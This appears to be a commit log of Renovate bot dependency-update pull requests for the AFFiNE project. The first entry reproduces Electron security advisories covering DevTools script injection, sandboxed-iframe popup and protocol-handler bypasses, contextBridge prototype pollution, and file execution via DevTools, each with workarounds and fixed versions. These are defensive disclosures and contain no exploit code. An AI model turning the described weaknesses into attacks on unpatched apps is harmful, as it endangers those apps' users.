[https://github.com/electron/electron/commit/30cf3882de75ee651bd4e5f27002f13fd3d3163a](https://redirect.github.com/electron/electron/commit/30cf3882de75ee651bd4e5f27002f13fd3d3163a) - [https://github.com/electron/electron/commit/4eff3dc09e4d1e62d649c5ce9902f532bb7469c7](https://redirect.github.com/electron/electron/commit/4eff3dc09e4d1e62d649c5ce9902f532bb7469c7) - [https://github.com/electron/electron/commit/615d62500fc7732d068274b796c49487e652e90b](https://redirect.github.com/electron/electron/commit/615d62500fc7732d068274b796c49487e652e90b) - [https://github.com/electron/electron/commit/fe2e7d0073949b4593b624b93abf1788f5377e55](https://redirect.github.com/electron/electron/commit/fe2e7d0073949b4593b624b93abf1788f5377e55) - [https://github.com/electron/electron/releases/tag/v39.8.8](https://redirect.github.com/electron/electron/releases/tag/v39.8.8) - [https://github.com/electron/electron/releases/tag/v40.9.0](https://redirect.github.com/electron/electron/releases/tag/v40.9.0) - [https://github.com/electron/electron/releases/tag/v41.2.1](https://redirect.github.com/electron/electron/releases/tag/v41.2.1) - [https://github.com/electron/electron/releases/tag/v42.0.0-beta.3](https://redirect.github.com/electron/electron/releases/tag/v42.0.0-beta.3) - [https://github.com/advisories/GHSA-v93f-fgjr-hjrj](https://redirect.github.com/advisories/GHSA-v93f-fgjr-hjrj) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-v93f-fgjr-hjrj) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: DevTools JavaScript Injection via Unsanitized Dock State Parameter [CVE-2026-70609](https://nvd.nist.gov/vuln/detail/CVE-2026-70609) / [GHSA-4f78-qhmw-8j8m](https://redirect.github.com/advisories/GHSA-4f78-qhmw-8j8m) <details> <summary>More information</summary> #### Details ##### Impact The `mode` option of `webContents.openDevTools()` was not sanitized before use by the DevTools frontend. If an attacker can influence this value, script under their control may run in the DevTools context, which in unsandboxed configurations has access to Node.js. Apps are only affected if untrusted input can reach the `mode` argument of `openDevTools()`, or if untrusted content can call `openDevTools()` on a `<webview>` it embeds. Apps that only ever pass a fixed dock mode are not affected. ##### Workarounds Only pass fixed, allowlisted values (`right`, `bottom`, `undocked`, `detach`) as the DevTools `mode`, and do not expose `openDevTools` to untrusted content. ##### Fixed Versions * `42.0.0-beta.1` * `41.2.0` * `40.9.0` * `39.8.7` ##### For more information If you have any questions or comments about this advisory, email Electron at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 5.7 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:H/I:H/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-4f78-qhmw-8j8m](https://redirect.github.com/electron/electron/security/advisories/GHSA-4f78-qhmw-8j8m) - [https://github.com/electron/electron/pull/50665](https://redirect.github.com/electron/electron/pull/50665) - [https://github.com/electron/electron/pull/50666](https://redirect.github.com/electron/electron/pull/50666) - [https://github.com/electron/electron/pull/50667](https://redirect.github.com/electron/electron/pull/50667) - [https://github.com/electron/electron/pull/50668](https://redirect.github.com/electron/electron/pull/50668) - [https://github.com/electron/electron/commit/04614eed17986bddc43eb509ec870424ee6a47d1](https://redirect.github.com/electron/electron/commit/04614eed17986bddc43eb509ec870424ee6a47d1) - [https://github.com/electron/electron/commit/2046ae87731d80a7b535512ae19acb529e10e33b](https://redirect.github.com/electron/electron/commit/2046ae87731d80a7b535512ae19acb529e10e33b) - [https://github.com/electron/electron/commit/969741f9f847c5c583f6bbc63ca22549dbd954ce](https://redirect.github.com/electron/electron/commit/969741f9f847c5c583f6bbc63ca22549dbd954ce) - [https://github.com/electron/electron/commit/efc4d3c6b6f1c04f658ca0d9d2512dcfe78eb7ba](https://redirect.github.com/electron/electron/commit/efc4d3c6b6f1c04f658ca0d9d2512dcfe78eb7ba) - [https://github.com/electron/electron/releases/tag/v39.8.7](https://redirect.github.com/electron/electron/releases/tag/v39.8.7) - [https://github.com/electron/electron/releases/tag/v40.9.0](https://redirect.github.com/electron/electron/releases/tag/v40.9.0) - [https://github.com/electron/electron/releases/tag/v41.2.0](https://redirect.github.com/electron/electron/releases/tag/v41.2.0) - [https://github.com/electron/electron/releases/tag/v42.0.0-beta.1](https://redirect.github.com/electron/electron/releases/tag/v42.0.0-beta.1) - [https://github.com/advisories/GHSA-4f78-qhmw-8j8m](https://redirect.github.com/advisories/GHSA-4f78-qhmw-8j8m) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-4f78-qhmw-8j8m) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: Sandboxed iframe can bypass the allow-popups restriction via the OpenURL navigation path [CVE-2026-70608](https://nvd.nist.gov/vuln/detail/CVE-2026-70608) / [GHSA-9f4c-93c8-jc8g](https://redirect.github.com/advisories/GHSA-9f4c-93c8-jc8g) <details> <summary>More information</summary> #### Details ##### Impact A sandboxed iframe without the `allow-popups` keyword could still open a new window (or trigger `setWindowOpenHandler`) with no user interaction, because new-window navigations taking the OpenURL path did not apply the iframe sandbox popup restriction. Apps that embed untrusted content in sandboxed iframes and rely on the absence of `allow-popups` to prevent window creation are affected. Apps that deny window creation in `setWindowOpenHandler`, or that do not embed untrusted content in sandboxed iframes, are not affected. ##### Workarounds Return `{ action: 'deny' }` from `setWindowOpenHandler` for any content you do not trust, rather than relying on the iframe sandbox alone. ##### Fixed Versions * `42.0.1` * `41.10.3` * `39.8.10` ##### For more information If you have any questions or comments about this advisory, email Electron at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 7.2 / 10 (High) - Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-9f4c-93c8-jc8g](https://redirect.github.com/electron/electron/security/advisories/GHSA-9f4c-93c8-jc8g) - [https://github.com/electron/electron/pull/51437](https://redirect.github.com/electron/electron/pull/51437) - [https://github.com/electron/electron/pull/51438](https://redirect.github.com/electron/electron/pull/51438) - [https://github.com/electron/electron/pull/51439](https://redirect.github.com/electron/electron/pull/51439) - [https://github.com/electron/electron/commit/3ff23c52ab364a0afc6ab5bd7851291d3159de57](https://redirect.github.com/electron/electron/commit/3ff23c52ab364a0afc6ab5bd7851291d3159de57) - [https://github.com/electron/electron/commit/57cbe329c4ae8aab5ac5ebdcb588adc9a11de0d3](https://redirect.github.com/electron/electron/commit/57cbe329c4ae8aab5ac5ebdcb588adc9a11de0d3) - [https://github.com/electron/electron/commit/68cf8b7d9122260f6b534a69a82c701a56cf159f](https://redirect.github.com/electron/electron/commit/68cf8b7d9122260f6b534a69a82c701a56cf159f) - [https://github.com/electron/electron/releases/tag/v39.8.10](https://redirect.github.com/electron/electron/releases/tag/v39.8.10) - [https://github.com/electron/electron/releases/tag/v41.10.3](https://redirect.github.com/electron/electron/releases/tag/v41.10.3) - [https://github.com/electron/electron/releases/tag/v42.0.1](https://redirect.github.com/electron/electron/releases/tag/v42.0.1) - [https://github.com/advisories/GHSA-9f4c-93c8-jc8g](https://redirect.github.com/advisories/GHSA-9f4c-93c8-jc8g) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-9f4c-93c8-jc8g) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: contextBridge object copy honors prototype setters [CVE-2026-70610](https://nvd.nist.gov/vuln/detail/CVE-2026-70610) / [GHSA-ff2p-hmqr-hxm4](https://redirect.github.com/advisories/GHSA-ff2p-hmqr-hxm4) <details> <summary>More information</summary> #### Details ##### Impact Objects copied across the `contextBridge` boundary from untrusted content could carry an attacker-influenced prototype, enabling prototype-pollution-style attacks against preload code despite context isolation being enabled. Apps are only affected if their preload code accepts object arguments from untrusted content and reads properties from them without own-property checks. Apps that only accept primitive arguments, or that validate object arguments, are not affected. ##### Workarounds Validate objects received from untrusted content with own-property checks (`Object.hasOwn`), or copy them onto a null-prototype object before use. ##### Fixed Versions * `42.0.0-beta.4` * `41.2.2` * `40.9.2` * `39.8.9` ##### For more information If you have any questions or comments about this advisory, email Electron at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 5.4 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-ff2p-hmqr-hxm4](https://redirect.github.com/electron/electron/security/advisories/GHSA-ff2p-hmqr-hxm4) - [https://github.com/electron/electron/pull/51083](https://redirect.github.com/electron/electron/pull/51083) - [https://github.com/electron/electron/pull/51084](https://redirect.github.com/electron/electron/pull/51084) - [https://github.com/electron/electron/pull/51085](https://redirect.github.com/electron/electron/pull/51085) - [https://github.com/electron/electron/pull/51086](https://redirect.github.com/electron/electron/pull/51086) - [https://github.com/electron/electron/commit/17d5d26499cd279fab48f5f26527f8edc02a7713](https://redirect.github.com/electron/electron/commit/17d5d26499cd279fab48f5f26527f8edc02a7713) - [https://github.com/electron/electron/commit/23a6efb714dec80e2cf45d3054d18d701162e4dd](https://redirect.github.com/electron/electron/commit/23a6efb714dec80e2cf45d3054d18d701162e4dd) - [https://github.com/electron/electron/commit/4ac50292d552fb510eb778392620c85308770a55](https://redirect.github.com/electron/electron/commit/4ac50292d552fb510eb778392620c85308770a55) - [https://github.com/electron/electron/commit/5b699544cbbed51bedb7c60d75c8c42be5825737](https://redirect.github.com/electron/electron/commit/5b699544cbbed51bedb7c60d75c8c42be5825737) - [https://github.com/electron/electron/releases/tag/v39.8.9](https://redirect.github.com/electron/electron/releases/tag/v39.8.9) - [https://github.com/electron/electron/releases/tag/v40.9.2](https://redirect.github.com/electron/electron/releases/tag/v40.9.2) - [https://github.com/electron/electron/releases/tag/v41.2.2](https://redirect.github.com/electron/electron/releases/tag/v41.2.2) - [https://github.com/electron/electron/releases/tag/v42.0.0-beta.4](https://redirect.github.com/electron/electron/releases/tag/v42.0.0-beta.4) - [https://github.com/advisories/GHSA-ff2p-hmqr-hxm4](https://redirect.github.com/advisories/GHSA-ff2p-hmqr-hxm4) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-ff2p-hmqr-hxm4) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: DevTools embedder handler executes arbitrary files via shell open [CVE-2026-70611](https://nvd.nist.gov/vuln/detail/CVE-2026-70611) / [GHSA-f2r8-jv7c-xqmp](https://redirect.github.com/advisories/GHSA-f2r8-jv7c-xqmp) <details> <summary>More information</summary> #### Details ##### Impact The DevTools "reveal in file manager" action could launch the target file rather than reveal it. An attacker with a separate means of running script inside the DevTools frontend (such as a malicious DevTools extension) could use this to execute native code outside the sandbox. Apps are only affected if DevTools is opened for windows exposed to untrusted content or untrusted DevTools extensions. Apps that do not open DevTools in that context are not affected. ##### Workarounds Do not open DevTools for windows that load untrusted content, and do not load untrusted DevTools extensions. ##### Fixed Versions * `42.0.0-beta.3` * `41.2.1` * `40.9.2` * `39.8.9` ##### For more information If you have any questions or comments about this advisory, email Electron at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 6.9 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-f2r8-jv7c-xqmp](https://redirect.github.com/electron/electron/security/advisories/GHSA-f2r8-jv7c-xqmp) - [https://github.com/electron/electron/pull/50937](https://redirect.github.com/electron/electron/pull/50937) - [https://github.com/electron/electron/pull/50938](https://redirect.github.com/electron/electron/pull/50938) - [https://github.com/electron/electron/pull/51114](https://redirect.github.com/electron/electron/pull/51114) - [https://github.com/electron/electron/pull/51115](https://redirect.github.com/electron/electron/pull/51115) - [https://github.com/electron/electron/commit/10fb5b39c5287f70c4bbcab4c24197f3871ec322](https://redirect.github.com/electron/electron/commit/10fb5b39c5287f70c4bbcab4c24197f3871ec322) - [https://github.com/electron/electron/commit/27bf1cae9274d5025684c7268496f435b7e06b44](https://redirect.github.com/electron/electron/commit/27bf1cae9274d5025684c7268496f435b7e06b44) - [https://github.com/electron/electron/commit/7a1eb7e5585991b3726cedb890a6244f327f43de](https://redirect.github.com/electron/electron/commit/7a1eb7e5585991b3726cedb890a6244f327f43de) - [https://github.com/electron/electron/releases/tag/v39.8.9](https://redirect.github.com/electron/electron/releases/tag/v39.8.9) - [https://github.com/electron/electron/releases/tag/v40.9.2](https://redirect.github.com/electron/electron/releases/tag/v40.9.2) - [https://github.com/electron/electron/releases/tag/v41.2.1](https://redirect.github.com/electron/electron/releases/tag/v41.2.1) - [https://github.com/electron/electron/releases/tag/v42.0.0-beta.3](https://redirect.github.com/electron/electron/releases/tag/v42.0.0-beta.3) - [https://github.com/advisories/GHSA-f2r8-jv7c-xqmp](https://redirect.github.com/advisories/GHSA-f2r8-jv7c-xqmp) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-f2r8-jv7c-xqmp) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Electron: Sandboxed iframes can launch external protocol handlers [CVE-2026-70612](https://nvd.nist.gov/vuln/detail/CVE-2026-70612) / [GHSA-p2rr-rvmm-c5fp](https://redirect.github.com/advisories/GHSA-p2rr-rvmm-c5fp) <details> <summary>More information</summary> #### Details ##### Impact Requests to open external protocol URLs from web content did not take iframe sandbox restrictions into account, so a sandboxed iframe could cause an OS-registered external application to be launched. The frame's sandbox state was also not made available to the app's permission handlers. Apps are only affected if they render untrusted content in sandboxed iframes and grant the `openExternal` permission (granted by default when no `setPermissionRequestHandler` is installed). Apps whose permission handler denies `openExternal` for untrusted content are not affected. ##### Workarounds Install a `setPermissionRequestHandler` that denies the `openExternal` permission for untrusted content. ##### Fixed Versions * `42.0.0-beta.3` * `41.2.1` * `40.9.0` * `39.8.8` ##### For more information If you have any questions or comments about this advisory, email Electron at [security@electronjs.org](mailto:security@electronjs.org) #### Severity - CVSS Score: 5.4 / 10 (Medium) - Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N` #### References - [https://github.com/electron/electron/security/advisories/GHSA-p2rr-rvmm-c5fp](https://redirect.github.com/electron/electron/security/advisories/GHSA-p2rr-rvmm-c5fp) - [https://github.com/electron/electron/pull/50961](https://redirect.github.com/electron/electron/pull/50961) - [https://github.com/electron/electron/pull/50962](https://redirect.github.com/electron/electron/pull/50962) - [https://github.com/electron/electron/pull/50963](https://redirect.github.com/electron/electron/pull/50963) - [https://github.com/electron/electron/pull/50964](https://redirect.github.com/electron/electron/pull/50964) - [https://github.com/electron/electron/commit/08b9d0a220e267d1a2402a44bdd01a2e9aa320b5](https://redirect.github.com/electron/electron/commit/08b9d0a220e267d1a2402a44bdd01a2e9aa320b5) - [https://github.com/electron/electron/commit/2764e4c35168855f614876051823db4f58a3714a](https://redirect.github.com/electron/electron/commit/2764e4c35168855f614876051823db4f58a3714a) - [https://github.com/electron/electron/commit/477dcf7afc6550715f9ec5e6f39ee38e5dd7bf39](https://redirect.github.com/electron/electron/commit/477dcf7afc6550715f9ec5e6f39ee38e5dd7bf39) - [https://github.com/electron/electron/commit/c39e3d5687d57434c8d5fe814c5152efd2f631c3](https://redirect.github.com/electron/electron/commit/c39e3d5687d57434c8d5fe814c5152efd2f631c3) - [https://github.com/electron/electron/releases/tag/v39.8.8](https://redirect.github.com/electron/electron/releases/tag/v39.8.8) - [https://github.com/electron/electron/releases/tag/v40.9.0](https://redirect.github.com/electron/electron/releases/tag/v40.9.0) - [https://github.com/electron/electron/releases/tag/v41.2.1](https://redirect.github.com/electron/electron/releases/tag/v41.2.1) - [https://github.com/electron/electron/releases/tag/v42.0.0-beta.3](https://redirect.github.com/electron/electron/releases/tag/v42.0.0-beta.3) - [https://github.com/advisories/GHSA-p2rr-rvmm-c5fp](https://redirect.github.com/advisories/GHSA-p2rr-rvmm-c5fp) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-p2rr-rvmm-c5fp) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>electron/electron (electron)</summary> ### [`v39.8.10`](https://redirect.github.com/electron/electron/releases/tag/v39.8.10): electron v39.8.10 [Compare Source](https://redirect.github.com/electron/electron/compare/v39.8.9...v39.8.10) ### Release Notes for v39.8.10 > \[!WARNING] > Electron 39.x.y has reached end-of-support as per the project's [support policy](https://www.electronjs.org/docs/latest/tutorial/electron-timelines#version-support-policy). Developers and applications are encouraged to upgrade to a newer version of Electron. #### Fixes - Ensured cross-origin `fetch()` and XHR are blocked for custom protocols registered with `supportFetchAPI: true` unless `corsEnabled: true` is also set; cross-origin `mode: 'no-cors'` requests now receive an opaque response. [#​51272](https://redirect.github.com/electron/electron/pull/51272) <sup>(Also in [40](https://redirect.github.com/electron/electron/pull/51271), [41](https://redirect.github.com/electron/electron/pull/51270), [42](https://redirect.github.com/electron/electron/pull/51269))</sup> - Fixed an issue where the Squirrel.Mac installer could resolve the target bundle path to different locations at different stages of an install. [#​50766](https://redirect.github.com/electron/electron/pull/50766) <sup>(Also in [42](https://redirect.github.com/electron/electron/pull/50765))</sup> #### Other Changes - Backported a fix for route\_id validation in the GPU command buffer. [#​51327](https://redirect.github.com/electron/electron/pull/51327) - Backported security fixes for [`4933194`](https://redirect.github.com/electron/electron/commit/493319454), [`4941583`](https://redirect.github.com/electron/electron/commit/494158331), [`4932347`](https://redirect.github.com/electron/electron/commit/493234757), [`4927361`](https://redirect.github.com/electron/electron/commit/492736100), [`4934134`](https://redirect.github.com/electron/electron/commit/493413432), [`4926688`](https://redirect.github.com/electron/electron/commit/492668885), [`4962818`](https://redirect.github.com/electron/electron/commit/496281816). [#​51257](https://redirect.github.com/electron/electron/pull/51257) - Backported several fixes in Skia, ANGLE, and WebRTC from upstream. [#​51266](https://redirect.github.com/electron/electron/pull/51266) ### [`v39.8.9`](https://redirect.github.com/electron/electron/releases/tag/v39.8.9): electron v39.8.9 [Compare Source](https://redirect.github.com/electron/electron/compare/v39.8.8...v39.8.9) ### Release Notes for v39.8.9 #### Other Changes - Fixed `gn gen` failing to resolve `electron_version` when building from a `git worktree` checkout. [#​51163](https://redirect.github.com/electron/electron/pull/51163) <sup>(Also in [40](https://redirect.github.com/electron/electron/pull/51164), [41](https://redirect.github.com/electron/electron/pull/51165), [42](https://redirect.github.com/electron/electron/pull/51166))</sup> - Security: backported fixes for CVE-2026-6296, CVE-2026-6297, CVE-2026-6298, CVE-2026-6299, CVE-2026-6300, CVE-2026-6301, CVE-2026-6302, CVE-2026-6303, CVE-2026-6304, CVE-2026-6305, CVE-2026-6306, CVE-2026-6307, CVE-2026-6308, CVE-2026-6309, CVE-2026-6311, CVE-2026-6312, CVE-2026-6313, CVE-2026-6314, CVE-2026-6316, CVE-2026-6318, CVE-2026-6358, CVE-2026-6359, CVE-2026-6360, CVE-2026-6361, CVE-2026-6362, CVE-2026-6363, CVE-2026-6364. [#​51141](https://redirect.github.com/electron/electron/pull/51141) ### [`v39.8.8`](https://redirect.github.com/electron/electron/releases/tag/v39.8.8): electron v39.8.8 [Compare Source](https://redirect.github.com/electron/electron/compare/v39.8.7...v39.8.8) ### Release Notes for v39.8.8 #### Fixes - Fixed an issue where DevTools would re-attach to the window when opened after previously being detached. [#​50818](https://redirect.github.com/electron/electron/pull/50818) <sup>(Also in [40](https://redirect.github.com/electron/electron/pull/50817), [41](https://redirect.github.com/electron/electron/pull/50816), [42](https://redirect.github.com/electron/electron/pull/50815))</sup> #### Other Changes - Backported fix for [chromium:74266014](https://issues.chromium.org/issues/474266014). [#​50175](https://redirect.github.com/electron/electron/pull/50175) - Backported upstream v8 fixes for several maglev, inspector, and arm64 code-generation edge cases. [#​50993](https://redirect.github.com/electron/electron/pull/50993) ### [`v39.8.7`](https://redirect.github.com/electron/electron/releases/tag/v39.8.7): electron v39.8.7 [Compare Source](https://redirect.github.com/electron/electron/compare/v39.8.6...v39.8.7) ### Release Notes for v39.8.7 #### Other Changes - Backported fix for [`4897116`](https://redirect.github.com/electron/electron/commit/489711638). [#​50624](https://redirect.github.com/electron/electron/pull/50624) - Backported fix for [`4939526`](https://redirect.github.com/electron/electron/commit/493952652). [#​50620](https://redirect.github.com/electron/electron/pull/50620) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4xMi4wIiwidXBkYXRlZEluVmVyIjoiNDQuMTIuMCIsInRhcmdldEJyYW5jaCI6ImNhbmFyeSIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
921e83bb4f |
chore: bump up @atlaskit/pragmatic-drag-and-drop-auto-scroll version to v3 (#15396)
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [@atlaskit/pragmatic-drag-and-drop-auto-scroll](https://atlassian.design/components/pragmatic-drag-and-drop/) ([source](https://redirect.github.com/atlassian/pragmatic-drag-and-drop)) | [`^2.1.2` → `^3.0.0`](https://renovatebot.com/diffs/npm/@atlaskit%2fpragmatic-drag-and-drop-auto-scroll/2.1.2/3.0.0) |  |  | --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
fdfb6df826 |
chore: bump up actions/setup-python action to v7 (#15416)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/setup-python](https://redirect.github.com/actions/setup-python) | action | major | `v6` → `v7` | --- ### Release Notes <details> <summary>actions/setup-python (actions/setup-python)</summary> ### [`v7.0.0`](https://redirect.github.com/actions/setup-python/compare/v6.3.0...v7.0.0) [Compare Source](https://redirect.github.com/actions/setup-python/compare/v7.0.0...v7.0.0) ### [`v7`](https://redirect.github.com/actions/setup-python/compare/v6.3.0...v7.0.0) [Compare Source](https://redirect.github.com/actions/setup-python/compare/v6.3.0...v7.0.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
8cc7c9a22f |
chore: bump up actions/setup-go action to v7 (#15410)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/setup-go](https://redirect.github.com/actions/setup-go) | action | major | `v6` → `v7` | --- ### Release Notes <details> <summary>actions/setup-go (actions/setup-go)</summary> ### [`v7.0.0`](https://redirect.github.com/actions/setup-go/releases/tag/v7.0.0) [Compare Source](https://redirect.github.com/actions/setup-go/compare/v7.0.0...v7.0.0) ##### What's Changed - Migrate to ESM and upgrade dependencies by [@​priyagupta108](https://redirect.github.com/priyagupta108) in [#​763](https://redirect.github.com/actions/setup-go/pull/763) - chore(deps): bump [@​actions/cache](https://redirect.github.com/actions/cache) to 6.2.0 by [@​philip-gai](https://redirect.github.com/philip-gai) in [#​771](https://redirect.github.com/actions/setup-go/pull/771) ##### New Contributors - [@​philip-gai](https://redirect.github.com/philip-gai) made their first contribution in [#​771](https://redirect.github.com/actions/setup-go/pull/771) **Full Changelog**: <https://github.com/actions/setup-go/compare/v6...v7.0.0> ### [`v7`](https://redirect.github.com/actions/setup-go/compare/v6.5.0...v7.0.0) [Compare Source](https://redirect.github.com/actions/setup-go/compare/v6.5.0...v7.0.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4zLjIiLCJ1cGRhdGVkSW5WZXIiOiI0NC4zLjIiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
a37b9a05ad |
chore: bump up actions/setup-node action to v7 (#15411)
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/setup-node](https://redirect.github.com/actions/setup-node) | action | major | `v6` → `v7` | --- ### Release Notes <details> <summary>actions/setup-node (actions/setup-node)</summary> ### [`v7.0.0`](https://redirect.github.com/actions/setup-node/releases/tag/v7.0.0) [Compare Source](https://redirect.github.com/actions/setup-node/compare/v7.0.0...v7.0.0) ##### What's Changed ##### Enhancements: - Add cache-primary-key and cache-matched-key as outputs by [@​gowridurgad](https://redirect.github.com/gowridurgad) in [#​1577](https://redirect.github.com/actions/setup-node/pull/1577) - Migrate to ESM and upgrade dependencies by [@​gowridurgad](https://redirect.github.com/gowridurgad) in [#​1574](https://redirect.github.com/actions/setup-node/pull/1574) ##### Bug fixes: - Remove dummy NODE\_AUTH\_TOKEN export by [@​gowridurgad](https://redirect.github.com/gowridurgad) in [#​1558](https://redirect.github.com/actions/setup-node/pull/1558) - Only use `mirrorToken` in `getManifest` if it's provided by [@​deiga](https://redirect.github.com/deiga) in [#​1548](https://redirect.github.com/actions/setup-node/pull/1548) ##### Documentation updates: - Add documentation for publishing to npm with Trusted Publisher (OIDC) by [@​chiranjib-swain](https://redirect.github.com/chiranjib-swain) in [#​1536](https://redirect.github.com/actions/setup-node/pull/1536) - docs: Update restore-only cache documentation by [@​priya-kinthali](https://redirect.github.com/priya-kinthali) in [#​1550](https://redirect.github.com/actions/setup-node/pull/1550) - docs: Update caching recommendations to mitigate cache poisoning risks by [@​chiranjib-swain](https://redirect.github.com/chiranjib-swain) in [#​1567](https://redirect.github.com/actions/setup-node/pull/1567) ##### Dependency update: - Upgrade [@​actions/cache](https://redirect.github.com/actions/cache) to 5.1.0, log cache write denied by [@​jasongin](https://redirect.github.com/jasongin) in [#​1569](https://redirect.github.com/actions/setup-node/pull/1569) ##### New Contributors - [@​chiranjib-swain](https://redirect.github.com/chiranjib-swain) made their first contribution in [#​1536](https://redirect.github.com/actions/setup-node/pull/1536) - [@​deiga](https://redirect.github.com/deiga) made their first contribution in [#​1548](https://redirect.github.com/actions/setup-node/pull/1548) - [@​jasongin](https://redirect.github.com/jasongin) made their first contribution in [#​1569](https://redirect.github.com/actions/setup-node/pull/1569) **Full Changelog**: <https://github.com/actions/setup-node/compare/v6...v7.0.0> ### [`v7`](https://redirect.github.com/actions/setup-node/compare/v6.5.0...v7.0.0) [Compare Source](https://redirect.github.com/actions/setup-node/compare/v6.5.0...v7.0.0) </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). 